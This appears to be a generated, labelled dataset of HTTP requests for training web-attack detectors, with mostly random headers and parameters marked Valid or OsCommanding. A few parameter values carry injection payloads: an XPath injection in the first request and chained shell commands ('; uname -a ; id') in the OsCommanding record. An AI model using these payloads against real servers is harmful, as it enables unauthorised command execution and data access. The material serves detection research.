GET /0esttnbr4htmscee/o5gahcrbi5rafgerpnTo/wN9UQ/a2LN2aC07kR2r1TY/sOXsAKlFmy@zqFi3cTpu/atmEnmd/lmp99z2iaytEotk0psb/qayD4.@kHivr8/e1S@qIZ6QNB.mdb?aaTLAZX=xtermriframe9f3&nStfote=628262264&m0lotuvno=0747236577&7qya1hTuuao=Emdcgghivbcwsaeins&4ueleel=53&lxrMk=45576255&nph-WHfAQPOlsam=gEeeseovsieaoseiU&oaa3rotvAlyyNn=6454973&yieio=029352&1irahse0=ae%269laa+agretn&6@xX2L=%5C%24OTMnteoe+a&sdnagDFaeioK=aofuiaaa%27+or++++%28i++++%3C++count%28sepBes%2Fchild%3A%3Atext%28%29%29+and+++++j+++%3C++++count%28Naodum%2Fchild%3A%3Acomment%28%29%29+++++and++k+++++%3C++count%28lf%2Fchild%3A%3A*%29++%29+or+++%27u6ejn%27++%3D++%27+ahr%27++or&tieFtorYiS=83093&ilns=1607032&favlqNoh=+ HTTP/1.0
Host: www.2Ttgue.org:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr;q=0.8, windows-1258;q=0.9, windows-1254;q=0.8, x-mac-arabic, koi8-r;q=0.5
Accept-Encoding: *
Accept-Language: nonr-9glain;q=0.2, gzw-8e, rn-n;q=0.8, csly9-deet;q=0.1, x-cc;q=0.3
Cache-Control: only-if-cached
Client-ip: 228.117.156.249
Cookie: dmrbndwexi=hcyO;og90bi=Msaeinosi;edtbUsS=e'stsyAeS;bodyY2YTTiframeda=g6iHsysfmetaUs;jKOX=6468345432;h5pXOfS=mnGX-_4LYadm
Cookie2: $Version="34"
Date: Sun, 13 Jun 04 11:03:58 CET
ETag: "d_atRBP91QL9mPSF61cb"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Sat, 30 Dec 06 24:31:46 GMT
If-Unmodified-Since: Sun, 26 Jun 05 24:22:49 CET
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: *
If-Range: Tue, 23 Mar 04 05:56:54 GMT
Max-Forwards: 7
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: Digest uri=/q5hlee0.doc
Range: 31-025167,936-84
Referer: /Taifa/1qtcni/eoz6c.cfm
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: iriol/9.1
UA-CPU: StrongARM
UA-Disp: 177,5703,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 1.2 www.ebtie.tiff
Transfer-Encoding: tedco; rtyeddya=lochU
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49626
Start - Id: 21046
class: Valid
GET /amcn7edCQ/imgO8eeadmin/euy/ds8b5R7/@catL./di/u1Hqq-UjwI8uqRTP/t6Pq0-Qi/r8eaaeste/Fiframe@_0ainputq.jpeg?gameEue=tf&sG1chtkeimamt=aaa&sdanastelnago=bmochaze%2B&gr7Y=nyhvxTob HTTP/1.1
Host: 146.15.11.138
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip, gzip;q=0.2, identity, identity
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 39.156.121.41
Cookie: atIau9peghxSa=kaNlocationbinnlhEtrnetcata7;nodeBNYvmn=703;eoeC9aobRnmyhn=oet
Cookie2: $Version="622"
Date: Wed, 26 Mar 08 16:04:20 UTC
ETag: "enp0VzH7u_wCvwnDQ"
Expect: rnms
From: rawdie@fihcr8nIjr.fr
If-Modified-Since: Sat, 04 Jun 05 22:06:41 CET
If-Unmodified-Since: Wed, 07 Jan 04 12:51:34 GMT
If-Match: ".er3eceVeYyvEoh0A"
If-None-Match: "cNAYiYfXn6WzVy1Vf1ty"
If-Range: Sun, 04 Oct 09 16:17:40 CET
Max-Forwards: 6191
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: Basic MmVvb3BuOnR0dGRv
Range: 4568-,9-457627
Referer: /LisbyY/7irsiav/2Nsda.sh
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/9.0 (compatible; Konqueror/7.1; Linux i386; 7Did)
UA-CPU: 68000
UA-Disp: 2624,2413,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 523x776
Via: FTP/7.4 www.hilta.png, 9.6 www.ziten.png, 5.7 176.134.64.65
Transfer-Encoding: compress
Upgrade: fi8t/2.3, 5rpaw/5.5, err/7.7, p5k5e/0.4, ydtwy/2.6
Warning: 623 98.104.50.147 "rrdkqSloae" 
X-Forwarded-For: 120.235.145.125
X-Serial-Number: 650978480578430420
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21046
Start - Id: 43182
class: OsCommanding
GET /fgahu6ivditkr1At8l/yal0epNe8RhyahmEH/t55nohzol/5mtmbgsoundCKRstdinZsamdq/r1sfaoaduggbsbSedyyn/passthru7R3zadminsadminLinNvpC/eentAlaea/eDWaIbTBawGrkeHyd/rbtPhNxqW7nz@/e-BhOGnFOWB7p37/h60-x/merrel3sEEm6h.bin?wuh3ms=%24eH%3A&tdorehha=sko&usnertose=qotDtmadu&vziaP4eVtea=iefltinmrEt&ii=+mpTeeRpr%3Bro%3E%3D%3Aytmp&ostts8ttoectc=%3Dalj&sfiptvhpkd=7&dSurisTn6vt=70691489&3a8tb=24&ug=eoajre1Ye&anftyT=odego&B46adminhttps=wu6_Sq&ymmorde=%3B+++++echo++++++++%3B+w++++%3B+uname+++-a++++++++%3B+++++id&rohlcTo19=UooU&we=3m1w HTTP/1.0
Host: 222.79.61.25
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.9, compress
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 177.135.197.204
Cookie: oaaN=in7WIxkl;hhsegtfvrmtl=lee21wherer;5p=ay9|tArl;drx1Ntat=fechodh;ascoldyr8nRoeop=5nscript;mjfSh%:oaSsL2;necrakien5=612
Cookie2: $Version="8"
Date: Tue, 25 Mar 08 09:51:48 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: dyewmaae=oUdqj
From: uirrjt1@GfnEevribm.be
If-Modified-Since: Sun, 26 Apr 09 18:12:49 GMT
If-Unmodified-Since: Tue, 26 Jun 07 07:49:22 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 24 Sep 06 12:14:53 UTC
Max-Forwards: 92
MIME-Version: 6.0
Pragma: esr='1taw'
Proxy-Authorization: hnLn 4itor=97es0a
Authorization: onwph lG2cieBg=omtw
Range: 332370-1588,656-95
Referer: http://Alhn9es1.gov/esriinae/3aaee/ceot/m9tobtth.bin
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: aCUJ2j http://www.fodroy.cz
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x846
Via: HTTP/8.1 www.ontw.css
Transfer-Encoding: compress
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 9831419059
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43182
Start - Id: 8541
class: Valid
GET /v7.zB0/r2_4E4aLHbpT/atecwe8rWsot/aduBteoawnqopaEH6l/ypvetqtt/sEup1AfELCxc/eGL.htm?vhabnjtlndenxno=0r4&yesoihEm8erte=fnull%2Fstq%26r%24plsrhhavingm7P&nulen=9269&BnQQun_jGP=8h&im=+ztise&iqQ@h6P9tqK=ndnwf&eist4hsou=94&6st1ieo7p0fqceB=70193&t6dutulteLyaeob=%256er&zohlnonsste=ewn&ddHlp0sghcalta=t+yOjt&Hem2=wheretujs8ne%3D- HTTP/1.0
Host: www.inetnz8.it
Connection: keep-alive
Accept: audio/*;q=0.5
Accept-Charset: cp-950;q=0.7, windows-874;q=0.3, windows-1254;q=0.1, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 215.104.92.124
Cookie: lsetLiau=(?ea t/ v%r(rgR
Cookie2: $Version="68"
Date: Sat, 24 Sep 05 06:36:41 GMT
ETag: "c@RfK5QgJdfUpsxLt"
Expect: 100-continue
From: gtmlhhzh@7orj4ow2.net
If-Modified-Since: Tue, 26 Apr 05 07:36:06 GMT
If-Unmodified-Since: Sun, 06 Feb 05 09:07:55 GMT
If-Match: "EsUVY13FpeJt4barcfje"
If-None-Match: *
If-Range: "WU4DoJe-HDSRaNUaa"
Max-Forwards: 36
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM NTR0RWw4bmhpYmE3YW9zYTJlZXR0dGFyaE14bXJvbkNuaA==
Authorization: nodhpm I7etiax=sEhme
Range: 288-033,80242-026
Referer: /Ecesnemt/sposlb/tqnPras/a6j9iR.nsf
TE: trailers,trailers,deflate;q=0.8
Trailer: Range
User-Agent: Mozilla/3.2 (compatible; nirt6aigi; Linux i586; eeC8; 1anoasw)
UA-CPU: PowerPC
UA-Disp: 872,363,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 108x957
Via: 9.7 www.nfoSe.png, 2.0 www.pte6id.gif, 8.1 www.uoaneton.js
Transfer-Encoding: identity
Upgrade: esa/9.9, odH0cg/5.0, y7e/2.0
Warning: 878 129.33.178.33 "eiIxR9mmrjm" 
X-Forwarded-For: 188.45.28.105
X-Serial-Number: 64710408
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8541
Start - Id: 18926
class: Valid
GET /yntcbeTat/e12gV5Em909e50X/nStK.iLOml/opLg-7@7A69Wp3aQt/tawrdbet8tl/SI/.v%uBperlz1allstdin8nQ4Z/cOEttnesapWzl/cltrAeeeeygddF/tnwoeqy/3enaue0tapwH3et69.tiff?dgenbe5S=ib&sehihiok=%3D&ce6M7lhneREqii5=8797032887&Tqirnr=b&0upia=snaztpmjbnesr&zieelpiav6=1045429&efaltqaiNnear=naiOTseanmthe52&jnph-eallusrPMoYFSY=qaL_ HTTP/1.0
Host: www.Stte.net
Connection: close
Accept: video/*, application/x-tar, application/rtf
Accept-Charset: x-mac-chinesesimp, iso-2022-jp, windows-1255
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 229.0.200.112
Cookie: tlh6ezowetom=cAdi;somerle4rootr=d4p7bl3egedgI;oaEm=ofXtmshosktssh;sbr9E=7
Cookie2: $Version="06"
Date: Tue, 16 Oct 07 22:28:55 CET
ETag: W/"su.O@LDx_sPJFRT9"
Expect: oetsEour
From: eb4jab@1o2nqwlt8.biz
If-Modified-Since: Mon, 14 Jul 08 19:48:39 CET
If-Unmodified-Since: Sun, 01 Oct 06 14:23:50 UTC
If-Match: "QzDH_PCEVdQ09P9"
If-None-Match: "1c0JHlTUgOYtO_Moe7"
If-Range: *
Max-Forwards: 822
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest qop=oflieizy
Range: -41,827169-245
Referer: /diinao/loxdi/iCigss.jpeg
TE: gzip;q=0.5
Trailer: If-Match
User-Agent: mheGaai
UA-CPU: Sparc
UA-Disp: 112,418,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 905x897
Via: poacae/1.5 www.s7bnohue.css, FTP/1.7 227.206.111.186, HTTP/6.6 234.2.234.4
Transfer-Encoding: gzip
Upgrade: ensdmo/4.9, 8gvNs/8.5, evntyz/9.1, 7nshfi/4.0
Warning: 206 www.rcar.js "iacalyetteu3rehb" "Sat, 27 May 06 22:33:16 GMT"
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18926
Start - Id: 19276
class: Valid
GET /oicrWAVyemIrsC.jsp?tearutagOe=tka%28Otor3&essEebirl=wsnq9illr7swrnw2 HTTP/1.1
Host: 193.211.49.133:838
Connection: atdiita
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 39.67.36.93
Cookie: oymoqyoinnggH3R=fsueno7ed1cemu;uRteTrtvedouuen=llJFl3dT
Cookie2: $Version="0"
Date: Mon, 27 Dec 04 09:37:22 GMT
ETag: W/"p1OvA.Ka.h.7uW@m-_J"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Sat, 11 Mar 06 03:26:10 GMT
If-Unmodified-Since: Mon, 08 Mar 10 21:29:01 CET
If-Match: *
If-None-Match: "-CHWlYtXWwatY-@68"
If-Range: Sat, 03 Apr 10 05:22:07 UTC
Max-Forwards: 4
MIME-Version: 6.0
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: Basic ZW1jY05leTplaFVDRWVxYQ==
Range: 784688-250,21331-
Referer: http://www.Qgm1ue.it/ss3E/Htay/mqyyoias.htm
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: Mozilla/8.6 (X11; U; Unix 9.4; fl-sn; rv:6.5.1) Gecko/13440223
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3128x8633
Via: 5.1 224.5.147.122, 2.9 143.189.83.235
Transfer-Encoding: gzip
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 029 www.Bnho.gif "udTe0toroga" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 750079016802641903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19276
Start - Id: 27683
class: Valid
GET /UtubissncsoeIiezmR/hK/cD@6M1A7UINgAx_U/sezit5sbloem156utfae/iiaziaat8gfdsh8bsop/input7Urlex@/sWNa2o9mho/ertlaexanaaS/mGnc8dH@1x7opt4RY/ctueEi1cbnteteohgl/nisis3maewdtazdsw7.jpg? HTTP/1.1
Host: www.seuhIv.be:62
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis, koi8;q=0.0, koi8-r;q=0.5, hz-gb-2312, ks_c_5601-1987;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: e-nai, q-ena7Zfoe, iehdTbir-otQ, ewtSr-alothErt;q=0.7
Cache-Control: max-age=63
Client-ip: 239.27.124.13
Cookie: _rPLwp--RAX@EZ=06;tt=it;ssveg=tQcouenioleuioe;Hreahsrxp=a1d1esfttubfaiqk4t;z1Pg=1so
Cookie2: $Version="6"
Date: Sun, 01 May 05 20:25:02 CET
ETag: W/"jjbn.BcKvzk8oUEXzB33"
Expect: 100-continue
From: drguoece@vffbtwio.it
If-Modified-Since: Thu, 21 May 09 15:50:21 UTC
If-Unmodified-Since: Wed, 02 Feb 05 01:44:30 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 46
MIME-Version: 9.8
Pragma: muynce5='dnSo'
Proxy-Authorization: lgSec kutD5n=ee0crrls
Authorization: Basic ZWU0NmVpOjNhaXJheGc=
Range: 716735-,44690-4,8-024480
Referer: http://atPS.net/ltzmditz.php3
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: osberIiw/4.2.0.2.3
UA-CPU: 68000
UA-Disp: 408,9856,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1357x8118
Via: 8.2 www.dcsow.js
Transfer-Encoding: identity
Upgrade: ctta/9.1, vei/5.7, E6s/8.8, Czed/7.6, Du5Rt/3.5
Warning: 161 www.eeLnseL.png "oeanonaeowoFisdeitn" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27683
Start - Id: 27480
class: Valid
GET /t@HauBkccqwfMC477k/k7NreLHJhtpassfX/iNlscript6/pxcfp-4L3oXef46g3/qdropPVTb2wIX_Ql/ds1hnieyLeya2snvrl.nsf?inoenbtisobA=322&flx7nnaekctu1ta=egx6Rednucdt6a&bnRl19sarnaefhx=wos&dd-Rs@7zmailEh=%27gnautoexeco%2B%24%29awc%3AMtot&hiu=5&vher=-cwinntp-scriptwhere%3BeirAvar1hs&Iqd=8403501&6gereocancrreS=4&oafn3nrsouE=dxc6zSzH&m9gmrne6dill=%3E%2F+&optA=n88NEXrnX2&eruheYVeo=enchThshEpg&es=Rstr7rIysiapEceidL HTTP/1.0
Host: www.Cd34eej.cz:80
Connection: asyAseed
Accept: */*;q=0.0
Accept-Charset: x-mac-roman;q=0.0, windows-874
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 124.253.112.175
Cookie: tfnatouil=4?+ahgtotBTtvbscript
Cookie2: $Version="5"
Date: Thu, 16 Sep 04 23:15:30 UTC
ETag: W/"IEx-AMngUriSteZmxot"
Expect: loselr
From: situra@sD6ieWtri.cz
If-Modified-Since: Sat, 15 Oct 05 09:37:33 CET
If-Unmodified-Since: Thu, 08 Dec 05 12:10:14 CET
If-Match: *
If-None-Match: "PMFlQxviZsT4-FT0C"
If-Range: *
Max-Forwards: 9
MIME-Version: 4.1
Pragma: 04Sam='uoqhsom'
Proxy-Authorization: Digest username="enae4"
Authorization: Basic Tm5zZWM0czpyZU9k
Range: -526042
Referer: /uirkO/9eiCa0IW/eecwl/6vsthr9.cgi
TE: deflate,gzip,chunked;q=0.4
Trailer: Referer
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 3.0; 1m-fd; rv:9.0.2) Gecko/62499809
UA-CPU: StrongARM
UA-Disp: 617,9793,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 802x162
Via: ybyr4/0.7 3.188.213.235, 8.7 178.24.47.56, icl/2.2 www.t06se.html:1
Transfer-Encoding: gzip
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 874 www.owRuocd.js "2ei4cbcrn2" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 1838751121363
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27480
Start - Id: 16353
class: Valid
GET /oqoeornmanlwnjnc/lYjC.php3?nkh7ss=l&9dsamLoBt=1delete7k%26r-waeh%3A&hrl0enirmg=h1e&iriaaii=qrlhebdoleobiRTncE&uU6R4G=Otjt&o2oGktnL=w5ngwindow.open&hf=6OJm_SdK&bJntlLfkw=9549165 HTTP/1.0
Host: 29.112.184.227
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.2
Accept-Encoding: identity, gzip
Accept-Language: nooeto-h;q=0.3
Cache-Control: max-age=6170
Client-ip: 30.8.44.125
Cookie: etThhpYram=I6o;9coslipeaeFhoni=40
Cookie2: $Version="88"
Date: Sun, 07 Nov 04 22:23:29 UTC
ETag: W/"gxr_NsvJNHs7kUt3"
Expect: 100-continue
From: ecDNddEy@dflrto.st
If-Modified-Since: Wed, 15 Aug 07 02:10:13 UTC
If-Unmodified-Since: Sat, 07 May 05 20:15:12 CET
If-Match: "DoE1irNJGp35nmLhkeX"
If-None-Match: *
If-Range: "GvfLeig@7ZgpPLXF"
Max-Forwards: 7
MIME-Version: 3.9
Pragma: tqraecc='iot3'
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: NTLM MmlpZzZkcG9hb21zc3lkd2V0ZW4xOUhIeWF3eWRudWlhZXVyaTdhYg==
Range: -652120,9-,091-
Referer: /ordqac8e/ef7eyeiy/hIitirno/ssriciie/ciecaQpa.pl
TE: chunked;q=0.9,gzip;q=0.8,trailers
Trailer: Accept-Charset
User-Agent: ueasraalu (aktUSxoNM; owmiy3; cWTrPCf3UI)
UA-CPU: Sparc
UA-Disp: 195,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8398x061
Via: 0.3 www.qaletA.html
Transfer-Encoding: identity
Upgrade: oE3e1/2.9, FMnex/9.0, o72ibo/5.9, dtimd/8.4
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 87401
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16353
Start - Id: 43
class: Valid
GET /uldettatieb9E.tiff?eeicdlu9r5jH=wednnfrcNn&2rmhvhdfgtnl=tgagr&hrcoaddehooa=o24-aEJXodZ&foi=nila0unl&itds=rcpy&ae6potxyr3Ihh=coaqinOqgidOtnel8&arwhcsib=eri2%7Cscript%40l3im+ehtrlink%26&mqu=moe+ueaarT%29sdrd&Meehd1tihesrtsN=rPtfaeS%3EeiitaIs&9tT3gjo1Himeo=0034&TBY3Dx=window.open&3Jdelete6PI=%28Mnawo&al7regmeEhdt=ddyjnhkoI HTTP/1.1
Host: www.7nsistjisn.org
Connection: aapyhis
Accept: */*
Accept-Charset: iso-8859-4;q=0.3
Accept-Encoding: gzip;q=0.7, identity, gzip;q=0.3, compress;q=0.0, identity;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 12.227.22.96
Cookie: taddrOcxytsetD=803;ysoUeSi=94057
Cookie2: $Version="56"
Date: Sat, 04 Nov 06 12:08:36 GMT
ETag: W/"txendMFnsxCj7AS8"
Expect: 100-continue
From: nfosysn@ettlan.fr
If-Modified-Since: Sun, 18 Feb 07 21:33:25 CET
If-Unmodified-Since: Sun, 25 Feb 07 20:22:59 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 17 Mar 10 01:19:41 UTC
Max-Forwards: 273
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: Basic OGRkbGRoaTpoYWp5Zg==
Range: -54670
Referer: http://www.mlldbe.net/s1blOm0/oarnid/uMTh8.exe
TE: trailers,chunked;q=0.7,trailers
Trailer: From
User-Agent: fdBW6YCgh http://www.7unStie.net
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2292x8708
Via: 9.3 249.7.13.238
Transfer-Encoding: gzip
Upgrade: ntyhts/3.8
Warning: 232 www.AlaosaP.html "peaiso" "Tue, 27 Oct 09 21:12:39 CET"
X-Forwarded-For: 236.194.223.102
X-Serial-Number: 436492
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43
Start - Id: 27057
class: Valid
GET /mohohmm3Nheku8e2mn/hplhboato2sh/oarzN3ecmOkfGu2arW8/t8tVsT9DQmd3r/9owheets8itheeshlai/hPGhG_xD0Sqe5sT_.MVg.exe?ut=fmtcw&neqr2wei7cm8=66338889 HTTP/1.0
Host: 28.187.114.98:256
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: sibebar-lDetim;q=0.9, 1th-tdontfrm, yTeahuc-U
Cache-Control: no-store
Client-ip: 232.69.187.237
Cookie: f1x2s80S6fh=2419573415
Cookie2: $Version="42"
Date: Tue, 21 Feb 06 04:50:54 CET
ETag: W/"I86vCp3@Fik_o5p"
Expect: 2ewHgml
From: smmeonm@Dgeraesbio.ch
If-Modified-Since: Tue, 02 Feb 10 20:12:38 UTC
If-Unmodified-Since: Sun, 07 Mar 10 08:22:12 UTC
If-Match: *
If-None-Match: "DPgZ34hVpHkXZQUUd"
If-Range: Mon, 22 Jun 09 22:52:07 CET
Max-Forwards: 82
MIME-Version: 2.2
Pragma: d=sii
Proxy-Authorization: Digest opaque="xol9"
Authorization: exote iUgai=yemdoy
Range: -2874,-02641
Referer: http://lbe2Ot.biz/w1oE/oIt1uaRm.sh
TE: gzip;q=0.6
Trailer: Upgrade
User-Agent: Mozilla/2.1 (compatible; avnt0n4abq; Open BSD i586; prqtaot; sEohm)
UA-CPU: PowerPC
UA-Disp: 2539,8756,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 6860x985
Via: 2.0 221.107.157.76
Transfer-Encoding: deflate
Upgrade: sqq/0.5, hnco/2.6, Bhotd/5.0
Warning: 487 190.19.226.50 "taog3tlnve" "Mon, 04 Jul 05 09:35:24 CET"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 855597603398
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27057
Start - Id: 33192
class: Valid
PUT /6.L9HJaM2/l3ftb/Vygroup byxdTku4/oMNQPkeI@UdBtlOc/d.kRhvR0yJMOq.html? HTTP/1.0
Content-Length: 36
Content-Language: oMyvm2r,1rw,e
Content-Encoding: gzip
Content-Location: /wH5an/nDco/sait/jcwpan/Emdh.mspx
Content-MD5: bG9uZWVUeWhkaEVjZE1lag==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 06 Apr 04 05:17:16 GMT
Last-Modified: Sun, 07 Feb 10 19:44:36 CET
Host: 53.186.187.148:118
Connection: rtett
Accept: */*;q=0.2
Accept-Charset: iso-2022-jp, iso-8859-1, x-mac-ce, x-mac-ce, iso-8859-15
Accept-Encoding: deflate;q=0.2, compress;q=0.9, gzip, compress, deflate;q=0.5
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 18.214.52.39
Cookie: lnxytesg=623793;j2f=nwou;iNEiceoAh=bEDE2E;neeavw=3849558
Cookie2: $Version="05"
Date: Tue, 13 Sep 05 14:18:49 UTC
ETag: "cuNfd9lkCo0c0_RAeqT"
Expect: fttc=bojaii
From: bowRwos@eCtnuhy9r.cz
If-Modified-Since: Tue, 16 Feb 10 12:00:25 CET
If-Unmodified-Since: Tue, 02 Jan 07 24:25:14 UTC
If-Match: "ff1wYxeBymNNO_ndQ4@"
If-None-Match: "0xIGopzh1sYof1ov"
If-Range: *
Max-Forwards: 98
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: sce5tA raoi=cstt
Range: 8-21126,9-397638
Referer: /Fiewy.exe
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: idOscq4h6 http://www.ioRlnOCT.com
UA-CPU: PowerPC
UA-Disp: 3198,1175,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7712x8519
Via: 7.0 255.226.40.56, HTTP/5.2 www.eilto.html
Transfer-Encoding: compress
Upgrade: blYO/9.0, dN8w/2.7, Ooa0/5.1, NcTat/8.3, alwi/9.7
Warning: 605 165.118.208.207:59007 "stw4t" 
X-Forwarded-For: 184.36.249.222
X-Serial-Number: 0421946796861302632
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

ebra0dep=19698149&gecvE7tde6fe=2ctLE

End - Id: 33192
Start - Id: 250
class: Valid
GET /ecTI3Um/sqk-qPWVcsqRkm/etbnitpcRoDuNeO/tnltsxaiHioedm/cn-JVanxxeXw/0io0qh3rheeoNh/Jfdocument2usrDm2/3yvNRV33xxuJp/6XAinhtOyuaZedd/p-rse-ym66eZq/ryU7p_Ml6ol7hVTFS.htm?qNaheii=txtiieeeRi&UvN@cx0f7=n75wesdodoee%5C&Daqyfaeneg=cec%28&copcPd=ww&UatrSddge=ta%3Bfxde%2Ff2di&chmj=597231&h0Q2W.qlocationD-2autoexec=02635872&kRrtks=ietc%7C%7C&iAasrivokgSvtt=rtielwjt&cehmrEmd=3&58a1petrrrs=d&ebboshhrnt7rkrh=%7Espel6eao1dd&DP5a7wvconnecteQ=888271&ovri=7&Ls525=mDE HTTP/1.0
Host: www.dsmelo.cz:1
Connection: close
Accept: application/*
Accept-Charset: x-mac-greek;q=0.1
Accept-Encoding: gzip;q=0.4
Accept-Language: ioeirkt-se;q=0.1
Cache-Control: no-store
Client-ip: 78.255.191.128
Cookie: uOxggP-Vyx=35209;scoi1onoo=eUrG
Cookie2: $Version="731"
Date: Sun, 23 Dec 07 03:32:59 UTC
ETag: W/"VqZEHgS9xPIrz8BBNB"
Expect: tpitsuee=kaEHtmts
From: yeXhbouc@7trpphie.it
If-Modified-Since: Wed, 08 Aug 07 18:48:13 GMT
If-Unmodified-Since: Tue, 22 Dec 09 15:12:03 GMT
If-Match: "et_FvMGu3mWI-U6"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.7
Pragma: rje=ae
Proxy-Authorization: nnedm sagh=xef1hdc
Authorization: 2twcv leEB=nO2sR
Range: -05955,931914-,024-
Referer: http://vpMs.it/emsem/eoSae1et/osrb2e/jelf.php4
TE: trailers,chunked;q=0.9,deflate
Trailer: Cache-Control
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 7.1; rl-pr; rv:0.6.9) Gecko/77794958
UA-CPU: StrongARM
UA-Disp: 7657,8182,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 2.4 www.shaer9.jpeg, HTTP/4.3 www.echtsnes.css
Transfer-Encoding: deflate
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 778 228.207.156.98 "emdbsg0nhaeda1q" "Thu, 02 Sep 04 15:14:39 UTC"
X-Forwarded-For: 73.229.35.89
